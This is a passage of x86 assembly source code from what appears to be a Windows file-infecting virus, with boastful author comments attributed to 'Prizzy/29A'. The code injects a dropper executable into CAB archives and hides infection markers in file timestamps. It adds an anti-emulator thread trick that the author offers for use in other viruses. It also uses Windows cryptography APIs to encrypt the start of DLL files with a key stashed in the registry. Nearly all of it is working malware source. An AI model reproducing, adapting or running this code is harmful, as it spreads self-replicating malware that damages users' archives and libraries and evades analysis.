		mov	edx,[ebp+__iCAB_fMemory]
		mov	ecx,[ebp+__iCAB_fFSize] ;number of bytes to read
		xor	esi,esi 		;file position
		mov	ebx,[ebp+__iCAB_fHandle];file handle
		call	__MyReadFile
		jc	__iCAB_dClose

		; check archive's header
		mov	edi,[ebp+__iCAB_fMemory]
		cmp	[edi],'FCSM'		;"MSCF" signature ?
		jnz	__iCAB_dClose
		cmp	word ptr [edi]. \
			(CABh_VersionMin - CAB_h_struct),0103h
		jnz	__iCAB_dClose

		; get volume number - I want only 1st volume
		cmp	word ptr [edi]. \
			(CABh_Number - CAB_h_struct),0000h
		jnz	__iCAB_dClose

		; set ESI on the first entry
		movzx	esi,word ptr [edi]. (CABh_FirstRec - CAB_h_struct)
		add	esi,[ebp+__iCAB_fMemory]

		; modify folder's starts
		push	esi
		movzx	ebx,word ptr [edi]. (CABh_nFolders - CAB_h_struct)
	__iCAB_modify:
		or	ebx,ebx
		jz	__iCAB_modified
		sub	esi,(CAB_file_start - CAB_directory_start)
		mov	eax,(CAB_entry - CAB_directory_start) - (8+1+3)
		add	eax,[ebp+__iCAB_nChars]
		add	dword ptr [esi]. \
			(CABd_FirstRec - CAB_directory_start),eax
		dec	ebx
		jmp	__iCAB_modify
	__iCAB_modified:
		pop	esi

		; make place for new folder
		push	edi
		mov	edi,esi
		add	edi,(CAB_file_start - CAB_directory_start)
		mov	ecx,[ebp+__iCAB_fFSize]
		add	ecx,[ebp+__iCAB_fMemory]
		sub	ecx,esi
		call	__movsd_back
		pop	edi

		; save offset - ESI=place of the new folder
		add	esi,00000004h
		mov	[ebp+__iCAB_myFolder],esi	;modify later

		; get number of files and calculate my new file position
		movzx	eax,word ptr [edi]. (CABh_nFiles - CAB_h_struct)
		push	eax
		call	ppe_get_rnd_range
		inc	eax
		xchg	eax,edx
		push	edx

		; modify all file structs in CAB archive
		add	esi,(CAB_file_start - CAB_directory_start)
		push	edi
		mov	edi,esi
	__iCAB_search:
		or	edx,edx
		jz	__iCAB_searched
		add	edi,(CABf_FileName - CAB_file_start)
		mov	ecx,-1
		xor	al,al
		repnz	scasb
		dec	edx
		jmp	__iCAB_search
	__iCAB_searched:
		mov	esi,edi
		pop	edi

		; update file in folder
		mov	dx,[edi].(CABh_nFolders - CAB_h_struct)

		; make place for new file struct
		push	edi
		mov	edi,esi
		add	edi,(CAB_entry - CAB_file_start) - (8+1+3)
		add	edi,[ebp+__iCAB_nChars] ;new file name length
		mov	ecx,[ebp+__iCAB_fFSize]
		add	ecx,[ebp+__iCAB_fMemory]
		add	ecx,(CAB_file_start - CAB_directory_start)
		sub	ecx,esi
		call	__movsd_back

		; set some values to file header
		mov	eax,[ebp+__iCAB_dFSize] ;drropper's file size
		mov	word ptr [ebp+CABe_Compr],ax
		mov	word ptr [ebp+CABe_UnCompr],ax
		mov	[ebp+CABf_UnCompSize],eax

		; save offset of the file struct
		add	esi,00000004h
		mov	edi,esi
		lea	esi,[ebp+CAB_file_start]
		mov	[esi].(CABf_Flags - CAB_file_start),dx
		mov	ecx,(CAB_entry - CAB_file_start) - (8+1+3)
		add	ecx,[ebp+__iCAB_nChars]
		rep	movsb
		mov	esi,edi
		pop	edi

		; modify files - ESI=next file struct
		pop	edx
		pop	ebx
		sub	ebx,edx 		;files to modify
		push	edi
		mov	edi,esi
	__iCAB_search_2:
		or	ebx,ebx
		jz	__iCAB_searched_2
		add	edi,(CABf_FileName - CAB_file_start)
		mov	ecx,-1
		xor	al,al
		repnz	scasb
		dec	ebx
		jmp	__iCAB_search_2
	__iCAB_searched_2:
		pop	edi

		; change CAB header
		inc	word ptr [edi]. \	;add new folder
			(CABh_nFolders - CAB_h_struct)
		inc	word ptr [edi]. \	;add new files
			(CABh_nFiles - CAB_h_struct)
		add	dword ptr[edi]. \
			(CABh_FirstRec - CAB_h_struct), \
			CAB_file_start - CAB_directory_start
		mov	eax,[ebp+__iCAB_dFSize]
		add	eax,[ebp+__iCAB_nChars]
		add	eax,(CAB_entry - CAB_file_start) - (8+1+3)
		add	dword ptr[edi]. \
			(CABh_FileSize - CAB_h_struct),eax

		; change folder's values
		mov	edi,[ebp+__iCAB_myFolder]
		mov	eax,[ebp+__iCAB_fFSize]
		add	eax,(CAB_entry - CAB_directory_start) -  (8+1+3)
		add	eax,[ebp+__iCAB_nChars]
		mov	[edi],eax		;offset to the 1st entry
		mov	word ptr [edi+4],0001h	;number of blocks
		mov	word ptr [edi+6],0000h	;type of compress

		; create new block and copy dropper
		mov	edi,[ebp+__iCAB_fMemory]
		add	edi,[ebp+__iCAB_fFSize]
		add	edi,(CAB_entry - CAB_directory_start) - (8+1+3)
		add	edi,[ebp+__iCAB_nChars]
		lea	esi,[ebp+CAB_entry]		;create new block
		mov	ecx,(CABe_Compr_data - CAB_entry)
		rep	movsb

		mov	edx,edi 			;copy my dropper
		mov	ecx,[ebp+__iCAB_dFSize]
		xor	esi,esi
		mov	ebx,[ebp+__iCAB_dHandle]
		call	__MyReadFile
		jc	__iCAB_dClose

		; "update" headers + whole file + dropper
		mov	edx,[ebp+__iCAB_fMemory]
		add	ecx,edi
		sub	ecx,edx
		xor	esi,esi
		mov	ebx,[ebp+__iCAB_fHandle]
		call	__MyWriteFile

		; archive has been infected
		mov	ebx,[ebp+__iCAB_fHandle]
		call	__set_archive_infected

	__iCAB_dClose:
		mov	eax,[ebp+__iCAB_fMemory]
		call	mdealloc
		mov	ebx,[ebp+__iCAB_dHandle]
		call	__MyCloseFile
	__iCAB_fClose:
		mov	ebx,[ebp+__iCAB_fHandle]
		call	__MyCloseFile

	__iCAB_finish:
		ret

;ÄÄÄ´ common archivez operations ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

		;---------------------------------------------------------
		;Check whether archive	has been  infected. This  function
		;reads	its time and  calculate whether  isn't divided	by
		;magic number (for this virus it is 117).
		;
		;  input:
		;	     EBX ... file handle
		;  output:
		;	     CFlags
		;
__get_archive_infected:

		; get archive file time
		lea	eax,[ebp+FileTime]
		push	eax			;LastWriteTime
		push	00000000h		;LastAccessTime
		push	00000000h		;CreationTime
		push	ebx			;file handle
		call	[ebp+ddGetFileTime]
		or	eax,eax
		jz	__gai_failed

		; convert "FileTime" to "SystemTime"
		lea	eax,[ebp+SystemTime]	;SystemTime structure
		push	eax
		lea	eax,[ebp+FileTime]	;FileTime structure
		push	eax
		call	[ebp+ddFileTimeToSystemTime]

		; hours, minutes, seconds, milliseconds add up
		lea	esi,word ptr [ebp+SystemTime]
		mov	ecx,(size SystemTime - 2) / 2
		xor	ebx,ebx
	__gai_calculate:
		lodsw
		add	ebx,eax
		dec	ecx
		jnz	__gai_calculate
		sub	ebx,1990
		sub	bx,word ptr [ebp+SystemTime.wDayOfWeek]

		xchg	eax,ebx
		call	__check_infected
		jnc	__gai_failed

		test	al,0F9h 		;hidden STC instruction
	__gai_failed	equ $-1
		ret

		;---------------------------------------------------------
		;This function set 117 value among Year, Month, Day, Hour,
		;Minute and Second value  by FileTime. At first I will put
		;random values there and then I will modify it once again.
		;
		;  input:
		;	     EBX ... file handle
		;

		; TimeBuffer:
		;		1st value = offset in SystemTime struct
		;		2nd value = max of generate number
		;		3rd value = increase generate number
		__sai_TimeBuffer db	0,10,0,  2,12,1,  6,30,1,  8,24,0
				 db    10,60,0, 12,60,0
		__sai_counter	 dd    00000000h
		;
__set_archive_infected:

		push	ebx

		; divide that number to Year, Month, Day, Hour, Minute...
	__sai_restart:
		lea	edi,[ebp+__sai_TimeBuffer]
		lea	edx,[ebp+SystemTime]
		mov	esi,117
		xor	ecx,ecx
	__sai_again:
		movzx	ebx,byte ptr [edi+ecx]	;offset in SystemTime struct
		movzx	eax,byte ptr [edi+ecx+1];generate number
		call	ppe_get_rnd_range
		cmp	byte ptr [edi+ecx+2],1
		jnz	__sai_loop
		inc	eax
	__sai_loop:
		mov	[edx+ebx],ax
		sub	esi,eax
		add	ecx,3
		cmp	ecx,3*6
		jnz	__sai_again

		; only even seconds
		test	[ebp+SystemTime].wSecond,1
		jnz	__sai_restart

		test	esi,80000000h
		jnz	__sai_restart
		or	esi,esi
		jz	__sai_continue

		; increase/decrease some value from SystemTime
	__sai_next_loop:
		lea	edi,[ebp+__sai_TimeBuffer]
		lea	edx,[ebp+SystemTime]
	__sai_new_value:
		mov	[ebp+__sai_counter],2		;disable Year
	__sai_next_value:
		xor	ecx,ecx 			;start of scaning
	__sai_next_round:
		add	ecx,3				;disable Year or
		movzx	eax,byte ptr [edi+ecx]		;next value
		movzx	ebx,byte ptr [edi+ecx+1]
		cmp	eax,[ebp+__sai_counter] 	;the right value
		jnz	__sai_next_round
		dec	bx				;'ceuse of gen. n.
		cmp	[edx+eax],bx
		jz	__sai_fulled

		inc	word ptr [edx+eax]		;increase value
		dec	esi				;decrease counter

	__sai_fulled:
		or	esi,esi 			;finish ?
		jz	__sai_continue
	__sai_disable_value:
		add	[ebp+__sai_counter],00000002h	;next value in ST
		cmp	[ebp+__sai_counter],00000004h	;"Day Of Week" value?
		jz	__sai_disable_value		;if yes, disable it
		cmp	[ebp+__sai_counter],0000000Ch	;"Second" value ?
		jz	__sai_disable_value		;if yes, disable it

		cmp	[ebp+__sai_counter],7*2 	;end of table ?
		jnz	__sai_next_value
		jmp	__sai_new_value

	__sai_continue:
		xor	eax,eax
		mov	[ebp+SystemTime].wMilliseconds,ax
		add	[ebp+SystemTime].wYear,1990

		; convert "SystemTime" to "FileTime"
		lea	eax,[ebp+FileTime]	;FileTime structure
		push	eax
		lea	eax,[ebp+SystemTime]	;SystemTime structure
		push	eax
		call	[ebp+ddSystemTimeToFileTime]

		; set FileTime
		pop	ebx			;file handle
		lea	eax,[ebp+FileTime]
		push	eax			;LastWriteTime
		push	00000000h		;LastAccessTime
		push	00000000h		;CreationTime
		push	ebx			;file handle
		call	[ebp+ddSetFileTime]
		or	eax,eax
		jz	__sai_failed

	__sai_failed:
		ret

		;---------------------------------------------------------
		;This function generates FileName to archive.
		;
		;  input:
		;	     EDI ... where put new name (maximum=8+1+3)
		;  output:
		;	     EAX ... filename length
		;
generate_name:
		pusha
		cld
		lea	esi,[ebp+gen_archive_filename]
		mov	eax,gen_archive_number
		call	ppe_get_rnd_range
		mov	ecx,eax
	name_search:
		jecxz	name_found
		movzx	eax,byte ptr [esi+1]
		add	eax,00000002h
		add	esi,eax
		dec	ecx
		jmp	name_search
	name_found:
		mov	ebx,edi
		mov	al,byte ptr [esi]
		call	gen_spec_char
	no_gen_1:
		movzx	ecx,byte ptr [esi+1]
		add	esi,00000002h
		rep	movsb

		call	gen_spec_char
		mov	eax,'exe.'
		mov	[edi],eax
		add	edi,4
		mov	edx,edi
		sub	edx,ebx

		mov	ecx,8+1+3
		sub	ecx,edx
		xor	al,al
		rep	stosb

		movzx	edx,dl
		mov	[esp].access_eax,edx
		popa
		ret

	gen_spec_char:
		or	al,al
		jz	char_exit
		mov	eax,00000002h
		call	ppe_get_rnd_range
		or	al,al
		jz	char_exit
		mov	byte ptr [edi],'!'
		inc	edi
	char_exit:
		ret

		;---------------------------------------------------------
		;This function copy source place to  destination. So  that
		;it is MOVSD instruction with STD flag.
		;
		;  input:
		;	     ESI ... source place in memory
		;	     EDI ... destination place in memory
		;	     ECX ... number bytes to move
		;
		;Note: ESI, EDI ain't real addresses- to understand see on
		;      the first four instructions.
		;
__movsd_back:
		add	esi,ecx 		;This code has been stolen
		dec	esi			;from CiA 1.50 sources.
		add	edi,ecx
		dec	edi			;(c)oded by Dement
		std				;dement@email.cz
		shr	ecx,01h
		jnc	__mb_nomovsb
		movsb
	__mb_nomovsb:
		jz	__mb_finish
		dec	esi
		dec	edi
		shr	ecx,01h
		jnc	__mb_nomovsw
		movsw
		jz	__mb_finish
	__mb_nomovsw:
		sub	esi,00000002h
		sub	edi,00000002h
		rep	movsd			;copy me - I wanna travel
	__mb_finish:
		cld
		ret

;ÄÄÄ´ function to actualize compressed programs ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

		;---------------------------------------------------------
		;This function was called itself from  Hyper Infection and
		;it means the extension has been found.
		;
		;  input:    EDX ... file name
		;	     EAX ... input parameter (pointer into table)
		;	     EBX ... next filename in HyperTable
archive_act:

		; for more information about EAX (tables), find "AProgram"
		; structure

		; save registers & load EAX parameter
		pusha
		mov	esi,eax
		add	esi,ebp

		; calculate filename length and allocate memory
		call	__get_last_char
		sub	edi,edx
		push	edi			;filename length
		add	edi,filename_size

		mov	eax,edi
		call	malloc
		mov	[esi.program],eax	;save destination place

		; copy filename there
		mov	esi,edx
		mov	edi,eax
		pop	ecx			;filename length
		rep	movsb

		; disable this archive program
		mov	byte ptr [ebx-HyperTable_HalfSize],01h

		; restore registers
		popa
		ret

;ÄÄÄ´ threads ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

;------------------------------------------------------------------------
; Anti-emulators:
;
;   Welcome everybody who wanna use this method in your viruses. At first
;   I hope you know whats "thread" and "fiber" (see Benny's tutorial). So
;   you active "__thread_1" which it'll patch your original code on NOPs,
;   and after that, who will write that original code there ?
;
;	    __thread_1_begin:
;			jmp	$	       ;instead this will be NOPs
;
;   And by "@ANTI_E_START" macro  you  will PUSH that original values and
;   then by "@ANTI_E_FINISH" you will restore  those values. Try to debug
;   this source and you'll understand it or send me mail.
;

		;--------------------------------------------------------
		;This thread rewrite some bytes. Common anti-emulator.
		;
		;  (__MyCreateThread)
		;  input:
		;    EAX ... address of this function (__thread_1)
		;    EBX ... information
		;	       * upper imm8 reg ... bytes to patch
		;	       * where from here (offset)
		;
__thread_1:
		push	eax ecx ebp
		call	get_base_ebp
		mov	eax,[esp+00000010h]	;get thread parameter
		mov	ecx,eax
		shr	ecx,18h 		;get last imm8 reg
		and	eax,00FFFFFFh
		add	eax,ebp
	__thread_1_loop:
		mov	byte ptr [eax],90h	;patch it
		inc	eax			;next byte to patch :)
		loop	__thread_1_loop
		pop	ebp ecx eax
		ret

;ÄÄÄ´ function to Win32 Cryptography APIs startup ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

		;---------------------------------------------------------
		;At last, at last I start to code this function, at last !
		;So, at first I must  check if "Prizzy/29A" key exists. If
		;not, I must create it. Also I'll check whether Crypto API
		;functions exists in "ADVAPI32.DLL" file because  they are
		;from "Windows 95, OEM Service Release 2" and WinNT, sure!
		;I cant also decrypt DLL  files on network's disks because
		;I must store CSP  cryptography key in	register class and
		;on those disks I couldn't load that CSP public/simple key
		;from that register. But it  does not matter because I can
		;infect EXE files on network's disks. Hehehe - Im perfect!
		;
crypto_startup:

		mov	[ebp+crypto_Action  ],00000000h
		mov	[ebp+crypto_loadKey ],00000000h
		mov	[ebp+crypto_Provider],00000000h

		; check if cryptography functions has been found...
		cmp	[ebp+ddCryptAcquireContextA],00000000h
		jz	__cs_fault

		; get if crypto key exists in registers...
		push	00000000h		;Flags
		push	00000001h		;PROV_RSA_FULL
		push	00000000h		;provider name
		lea	eax,[ebp+crypto_KeyName]
		push	eax			;my special key
		lea	eax,[ebp+crypto_Provider]
		push	eax			;CSP provider
		call	[ebp+ddCryptAcquireContextA]
		or	eax,eax 		;does key exist ?
		jnz	__cs_continue

		; create new key
		push	00000008h		;CRYPT_NEWKEYSET
		push	00000001h		;PROV_RSA_FULL
		push	00000000h		;provider name
		lea	eax,[ebp+crypto_KeyName]
		push	eax			;my special key
		lea	eax,[ebp+crypto_Provider]
		push	eax			;CSP provider
		call	[ebp+ddCryptAcquireContextA]
		or	eax,eax
		jz	__cs_fault

		; register folder "Prizzy/29A" has been created or opened
		; now, check whether I have to generate CPS key
	__cs_continue:
		call	__cs_created_key
		jc	__cs_fault

		; generate CSP key for my... for my... for my purpose {:-)
		lea	eax,[ebp+crypto_Key]
		push	eax			;key's value
		push	00000001h		;CRYPT_EXPORTABLE
		push	00000001h		;AT_KEYEXCHANGE
		push	[ebp+crypto_Provider]
		call	[ebp+ddCryptGenKey]	;generate key
		or	eax,eax
		jz	__cs_fault

		; get handle to the key exchange
		lea	eax,[ebp+crypto_XchgKey]
		push	eax
		push	00000001h		;AT_KEYEXCHANGE
		push	[ebp+crypto_Provider]
		call	[ebp+ddCryptGetUserKey]

		; get a random block cipher session key
		lea	eax,[ebp+crypto_Key]
		push	eax
		push	00000001h		;CRYPT_EXPORTABLE
		push	00006602h		;CALG_RC2
		push	[ebp+crypto_Provider]
		call	[ebp+ddCryptGenKey]

		; determine size of key blob and allocate memory
		lea	eax,[ebp+crypto_BlobLen]
		push	eax
		push	00000000h
		push	00000000h
		push	00000001h		;SIMPLEBLOB
		push	[ebp+crypto_XchgKey]
		push	[ebp+crypto_Key]
		call	[ebp+ddCryptExportKey]	;get simple blob key length

		; allocate memory for SIMPLE key (maximum 256 bytes)
		mov	eax,[ebp+crypto_BlobLen]
		call	malloc
		mov	[ebp+crypto_BlobKey],eax

		; export key into a simple key blob
		lea	eax,[ebp+crypto_BlobLen]
		push	eax			;length of simple key
		push	[ebp+crypto_BlobKey]	;simple blob key buffer
		push	00000000h
		push	00000001h		;SIMPLEBLOB
		push	[ebp+crypto_XchgKey]
		push	[ebp+crypto_Key]
		call	[ebp+ddCryptExportKey]	;generate simple key

		; get other registery information
		lea	eax,[ebp+crypto_BlobHan]
		mov	ecx,80000001h		;HKEY_CURRENT_USER
		lea	esi,[ebp+crypto_Register]
		call	__regOpen
		jc	__cs_dealloc

		; create binary sub-key "Kiss Of Death" it'll be "SimpleKey"
		push	[ebp+crypto_BlobLen]	;size of value
		push	[ebp+crypto_BlobKey]	;address of data buffer
		push	00000003h		;REG_BINARY flag
		push	00000000h		;reserved
		lea	eax,[ebp+crypto_RegFlag]
		push	eax			;name of value
		push	[ebp+crypto_BlobHan]
		call	[ebp+ddRegSetValueExA]	;update it :)
		or	eax,eax
		jnz	__cs_dealloc_2

	__cs_close_reg:
		; close register
		push	[ebp+crypto_BlobHan]	;my register handle
		call	[ebp+ddRegCloseKey]

	__cs_close_key:
		; close cryptography key
		push	[ebp+crypto_Key]	;my generated key
		call	[ebp+ddCryptDestroyKey]

	__cs_finish:
		mov	eax,[ebp+crypto_Provider]
		or	eax,eax
		jz	__cs_end
		push	00000000h
		push	eax
		call	[ebp+ddCryptReleaseContext]
	    __cs_end:
		ret

	__cs_fault:
		mov	[ebp+crypto_Action],00000001h
		jmp	__cs_finish

	__cs_dealloc:
		mov	eax,[ebp+crypto_BlobKey]
		call	mdealloc
		mov	[ebp+crypto_Action],00000001h
		jmp	__cs_close_key

	__cs_dealloc_2:
		mov	eax,[ebp+crypto_BlobKey]
		call	mdealloc
		mov	[ebp+crypto_Action],00000001h
		jmp	__cs_close_reg


		;---------------------------------------------------------
		;This function	checks	whether "Kiss Of Death"  exists in
		;"Prizzy/29A" cryptography  register-class. All is because
		;of CSP generating public key.
		;
		__csck_regHan	dd	00000000h	;register handle
		__csck_regFlag	dd	00000000h	;register type flag
		;
	__cs_created_key:

		; open register folder "Prizzy/29A"
		lea	eax,[ebp+__csck_regHan]
		mov	ecx,80000001h		;HKEY_CURRENT_USER
		lea	esi,[ebp+crypto_Register]
		call	__regOpen
		jc	__csck_fault

		; open binary sub-key "Kiss Of Death"
		push	00000000h		;address of data buffer size
		push	00000000h		;address of data buffer
		mov	eax,00000003h
		lea	ebx,[ebp+__csck_regFlag]
		mov	[ebx],eax
		push	ebx			;REG_BINARY flag
		push	00000000h		;reserved
		lea	eax,[ebp+crypto_RegFlag]
		push	eax			;name of value
		push	[ebp+__csck_regHan]
		call	[ebp+ddRegQueryValueExA]
		or	eax,eax
		pushf
		  push	  [ebp+__csck_regHan]	;close register folder
		  call	  [ebp+ddRegCloseKey]
		popf
		jz	__csck_fault

		test	al,0F9h 		;hidden STC instruction
	__csck_fault	equ $-1
		ret

;ÄÄÄ´ function to crypt DLL file ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

		;---------------------------------------------------------
		;This function encrypts DLL file by Win32 Crypto functions
		;I will encode only two kilobytes.
		;
		;Behaviour:
		;  * load SIMPLE key from reg
		;  * read 2008 bytes from DLL to memory
		;  * encrypt 1992 bytes
		;  * save last eight bytes because when i'll encode next
		;    eight bytes, WinAPI rewrite 16 bytes, not 8.
		;  * encrypt 8 bytes (in fact, it will be 16 bytes)
		;  * calculate CRC64 for that 8 bytes
		;  * save CRC64 and that 8 bytes to the end of file
		;
		;
		;  input:    search_filename ... DLL file name
		;
		__cf_handle	dd	00000000h	;library's handle
		__cf_FSize	dd	00000000h	;library's file size
		__cf_Memory	dd	00000000h	;library's 2Kb body
		__cf_header	dw	0000h		;library's signature
		__cf_EncodeSize dd	00000000h	;real encoded size
		__cf_QwordCRC64 dq	00h		;Qword CRC64
		__cf_QWORD	dq	00h		;bad WinAPI function
		;
crypt_file:

		; don't call this function once again in actual time
		mov	dword ptr [ebp+crypto_thread],00000000h

		; check unCrypted DLLs
		mov	ebx,[ebp+filename_ptr]
		call	crypt_DLL_check
		jc	__cf_finish

		; check file, I don't wanna risk :) ["E:\XXXX\" directory]
	IFDEF DEBUG
		cmp	dword ptr [ebp+filename],'X\:E'
		jnz	__cf_finish
		cmp	dword ptr [ebp+filename+4],'\XXX'
		jnz	__cf_finish
	ENDIF

		; open DLL file
		mov	edx,[ebp+filename_ptr]
		call	__MyOpenFile
		jc	__cf_finish
		mov	[ebp+__cf_handle],eax

		; read its signature
		lea	edx,[ebp+__cf_header]	;destination place
		mov	ecx,00000002h		;bytes to read
		xor	esi,esi 		;file position
		mov	ebx,[ebp+__cf_handle]
		call	__MyReadFile
		jc	__cf_fClose

		; check its signature
		cmp	word ptr [ebp+__cf_header],'ZM'
		jnz	__cf_fClose

		; get its file size
		mov	ebx,[ebp+__cf_handle]
		call	__MyGetFileSize
		mov	[ebp+__cf_FSize],eax

		cmp	eax,5000		;lesser then 5Kb ?
		jb	__cf_fClose

		; allocate memory for 2 kilobytes
		mov	eax,2008
		call	malloc
		mov	[ebp+__cf_Memory],eax

		; read two kilobytes
		mov	edx,[ebp+__cf_Memory]	;destination place
		mov	ecx,2008		;number of bytes to read
		xor	esi,esi 		;file position
		mov	ebx,[ebp+__cf_handle]	;file handle
		call	__MyReadFile
		jc	__cf_dealloc

		; get PE/NE signature
		mov	eax,[ebp+__cf_Memory]
		add	eax,[eax.MZ_lfanew]
		cmp	word ptr [eax],'EP'	;no PE sign ?
		jnz	__cf_dealloc

		; encrypt 1992 bytes (next 8 bytes will be with last flag)
		mov	[ebp+__cf_EncodeSize],1992
		push	2000			;total bytes to encrypt
		lea	eax,[ebp+__cf_EncodeSize]
		push	eax			;real encoded size
		push	[ebp+__cf_Memory]	;mem address
		push	00000000h		;flags
		push	00000000h		;last block ?
		push	00000000h		;hash
		push	[ebp+__clk_hKey]	;imported key
		call	[ebp+ddCryptEncrypt]
		or	eax,eax
		jz	__cf_dealloc

		; save next two dwords to copro reg
		mov	eax,[ebp+__cf_Memory]
		fsave	[ebp+copro_nl_buffer]	;save all regz & flagz
		fild	qword ptr [eax+000007D0h]
		fistp	qword ptr [ebp+__cf_QWORD]
		frstor	[ebp+copro_nl_buffer]	;restore all regz & flagz

		; encode next 8 bytes
		mov	[ebp+__cf_EncodeSize],8
		push	2000			;total bytes to encrypt
		lea	eax,[ebp+__cf_EncodeSize]
		push	eax			;real encoded size
		mov	eax,[ebp+__cf_Memory]
		add	eax,1992
		push	eax			;mem address
		push	00000000h		;flags
		push	00000001h		;last block ?
		push	00000000h		;hash ?
		push	[ebp+__clk_hKey]	;imported key
		call	[ebp+ddCryptEncrypt]
		or	eax,eax
		jz	__cf_dealloc

		; save encypted data, what a dream {:-)
		mov	edx,[ebp+__cf_Memory]
		mov	ecx,2008		;number of bytes to write
		xor	esi,esi
		mov	ebx,[ebp+__cf_handle]
		call	__MyWriteFile
		jc	__cf_dealloc

		; get one DWORD from key and lose that value :)
		lea	eax,[ebp+__cf_QWORD]
		mov	ecx,00000008h		;QWORDs length
		push	eax			;buffer position
		mov	esi,eax 		;start of CRC64 calculating
		call	__bruteCRC64		;wow! get CRC64 for BlobKey
		mov	dword ptr [ebp+__cf_QwordCRC64],eax
		mov	dword ptr [ebp+__cf_QwordCRC64+00000004h],edx
		pop	esi
		xor	ebx,ebx
		mov	[esi],ebx		;clear that value :)

		; write replaced QWORD on the end of file
		lea	edx,[ebp+__cf_QwordCRC64]
		mov	ecx,00000010h
		mov	esi,[ebp+__cf_FSize]
		mov	ebx,[ebp+__cf_handle]
		call	__MyWriteFile
		jc	__cf_dealloc

	__cf_dealloc:
		mov	eax,[ebp+__cf_Memory]
		call	mdealloc
	__cf_fClose:
		mov	ebx,[ebp+__cf_handle]
		call	__MyCloseFile

	__cf_finish:
		jmp	__ct_finish		;go back to thread

;ÄÄÄ´ function to decrypt DLL file ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

		;---------------------------------------------------------
		;This function decrypts DLL file by WinAPI cryptography f.
		;
		;Behaviour:
		;  * load SIMPLE key from registers "Kiss Of Death" key :)
		;  * open DLL and read 2008 bytes, check 'MZ' if it's encr.
		;  * read 16 bytes, calculate right value by CRC64
		;  * decrypt the first part
		;  * decrypt the second part of DLL file body
		;  * replace de-CRC64 bytes (eight bytes)
		;  * truncate files - 16 bytes
		;
		;
		;  input:    filename_ptr ... DLL file name
		;
		__df_handle	dd	00000000h	;library's handle
		__df_header	dw	0000h		;library's signature
		__df_FSize	dd	00000000h	;library's file size
		__df_memory	dd	00000000h	;library's memory
		__df_decSize	dd	00000000h	;decode size
		;
		__df_CRC64	dq	00h		;CRC64 of lost qword
		__df_QWORD	dq	00h		;WinAPI lost qword
		;
decrypt_file:

		; don't call this function once again in actual time
		mov	dword ptr [ebp+crypto_thread],00000000h

		; check unCrypted DLLs
		mov	ebx,[ebp+filename_ptr]
		call	crypt_DLL_check
		jc	__df_finish

		; check file, I don't wanna risk :) ["E:\XXXX\" directory]
	IFDEF DEBUG
		mov	edx,[ebp+filename_ptr]
		cmp	dword ptr [edx],'X\:E'
		jnz	__df_finish
		cmp	dword ptr [edx+00000004h],'\XXX'
		jnz	__df_finish
	ENDIF

		; open DLL file
		mov	edx,[ebp+filename_ptr]
		call	__MyOpenFile
		jc	__df_finish
		mov	[ebp+__df_handle],eax

		; read two bytes and check whether library is crypted
		lea	edx,[ebp+__df_header]
		mov	ecx,00000002h		;two bytes to read
		xor	esi,esi 		;file position
		mov	ebx,[ebp+__df_handle]
		call	__MyReadFile
		jc	__df_finish

		cmp	[ebp+__df_header],'ZM'	;check library signature
		jz	__df_fClose

		; get library file size
		mov	ebx,[ebp+__df_handle]
		call	__MyGetFileSize
		mov	[ebp+__df_FSize],eax

		cmp	eax,5000		;lesser then 5Kb ?
		jb	__df_fClose

		; load CRC64 and WinAPI lost qword
		lea	edx,[ebp+__df_CRC64]
		mov	ecx,00000010h
		mov	esi,[ebp+__df_FSize]	;filesize
		sub	esi,ecx 		; - 10h (2*qword)
		mov	ebx,[ebp+__df_handle]
		call	__MyReadFile
		jc	__df_fClose

		; get real value from CRC64, by "brute-CRC64", i'm perfect !!
		lea	esi,[ebp+__df_QWORD]	;input buffer
		mov	ecx,00000008h		;lenght of buffer
		mov	eax,dword ptr [ebp+__df_CRC64]
		mov	edx,dword ptr [ebp+__df_CRC64+00000004h]
		call	__get_bruteCRC64

		; allocate memory for 2Kb
		mov	eax,2008
		call	malloc
		mov	[ebp+__df_memory],eax

		; read crypted bytes :)
		mov	edx,[ebp+__df_memory]	;destination buffer
		mov	ecx,2008		;only 2Kb
		xor	esi,esi
		mov	ebx,[ebp+__df_handle]
		call	__MyReadFile
		jc	__df_dealloc

		; decrypt the first part of DLL's body
		lea	eax,[ebp+__df_decSize]
		mov	dword ptr [eax],1992	;number of bytes to decrypt
		push	eax
		push	[ebp+__df_memory]	;address of buffer
		push	00000000h		;flags
		push	00000000h		;it isn't last block
		push	00000000h		;hash
		push	[ebp+__clk_hKey]	;imported key
		call	[ebp+ddCryptDecrypt]
		or	eax,eax
		jz	__df_dealloc

		; decrypt the second part of DLL's body
		lea	eax,[ebp+__df_decSize]
		mov	dword ptr [eax],8*2	;number of bytes to decrypt
		push	eax
		mov	eax,[ebp+__df_memory]
		add	eax,1992
		push	eax			;address of buffer
		push	00000000h		;flags
		push	00000001h		;is is last block
		push	00000000h		;hash
		push	[ebp+__clk_hKey]	;imported key
		call	[ebp+ddCryptDecrypt]
		or	eax,eax
		jz	__df_dealloc

		; restore re-written bytes by WinAPI :(
		mov	eax,[ebp+__df_memory]
		fsave	[ebp+copro_nl_buffer]	;save all regz & flagz
		fild	qword ptr [ebp+__df_QWORD]
		fistp	qword ptr [eax+2000]
		frstor	[ebp+copro_nl_buffer]	;restore all regz & flagz

		; write the first 2008 bytes to DLL :)
		mov	edx,[ebp+__df_memory]
		mov	ecx,2008
		xor	esi,esi
		mov	ebx,[ebp+__df_handle]
		call	__MyWriteFile
		jc	__df_dealloc

		; truncate last sixteen bytes
		push	00000000h
		push	00000000h
		mov	eax,[ebp+__df_FSize]
		sub	eax,00000010h
		push	eax			;new "End Of File"
		push	[ebp+__df_handle]
		call	[ebp+ddSetFilePointer]
		cmp	eax,-1
		jz	__df_dealloc

